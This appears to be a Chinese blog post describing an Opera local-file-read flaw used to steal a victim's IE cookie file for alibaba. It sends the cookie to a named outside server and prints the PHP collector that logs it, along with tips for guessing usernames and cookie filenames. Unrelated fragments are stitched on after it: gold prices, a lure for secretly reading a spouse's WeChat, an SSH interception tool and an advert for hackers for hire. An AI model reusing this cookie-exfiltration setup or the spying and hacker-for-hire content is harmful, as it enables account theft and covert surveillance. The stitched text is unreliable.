空虚浪子心 这也可能是一个安全特性吧,opera可以使用ajax读取本地文件。ff3没有这个漏洞。不废话,看代码吧。利用方式如下:这段代码保存为本地htm文件,然后使用opera打开。将会把本地用户名为administrator在alibaba的cookie,发送到http://www.inbreak.net/kxlzxtest/testxss/a.php a.htm 代码 a.php代码: a.php 代码 <?php $user_IP = ($_SERVER["HTTP_VIA"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"]; $user_IP = ($user_IP) ? $user_IP : $_SERVER["REMOTE_ADDR"]; $fp = fopen($user_IP.date("Y-m-d H:i:s")."cookie.txt","wb"); fwrite($fp,$_GET["cookie"]); fclose($fp); ?> a.php会按照 IP+时间+cookie.txt 格式生成一个txt文件。例如:121.0.29.2252009-01-05 11:55:02cookie.txt里面保存着administrator@alibaba[1].txt的内容。几点说明:1,cookie文件是IE的,比较XX,但是有很多人都会IE和opera混用。2,必须预测本地用户名,不过很多人都是administrator。3,必须预测cookie文件名。这个可以取一些常用网站的,反正ajax是异步,你可以同时调用几个 *** 。4,或者你可以发送任何本地TXT文件。opera可能说这是特性?不知道了,反正FF3没这个漏洞,使用这种方式会报错访问拒绝。
可是关于那些需求在低等级状况下运转并期望代码尽或许快的用户来说,ArrayBuffers和SharedArrayBuffers则是一个比较好的挑选。 2018年共有430余万台(只包含国内且不含Wan...
今天海内首饰金,千足金金价周大福 饰品金价(内陆) 299.00 周生生 饰品金价(内陆) 299.00 老凤祥 足金价值 297.50菜百 饰品金条价值 279.00小叶丹六福 饰品金价(内陆)...
一招教你如何悄悄接受丈夫手机微信(同歩丈夫微信聊天纪录不许发觉)暑假快到了,除开高兴去玩,也要还记得维护手机上中的一些数据信息,一些关键的数据信息能够提早备份数据,万一在出门玩的情况下不经意中遗失了,...
SSH-MITM-拦截SSH流量SSH-MITM服务器专为安全审计而设计,支持公钥认证、会话劫持和文件篡改等功能。需要注意的是,该工具基于Python语言开发,因此需要在主机设备上安装并配置好Pyth...
黑客用什么电脑有什么系统(黑客电脑系统下载)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客...
一字千金的意思(人生中最经典的一句话)一、人要记住:房子再贵,你睡的只是一张床。车子再好,超速还是要吃罚单。包包再贵,也只比塑料袋多一个炫富的功能。别人的老婆再美,总有一天会变成老太太。不要为了追求没...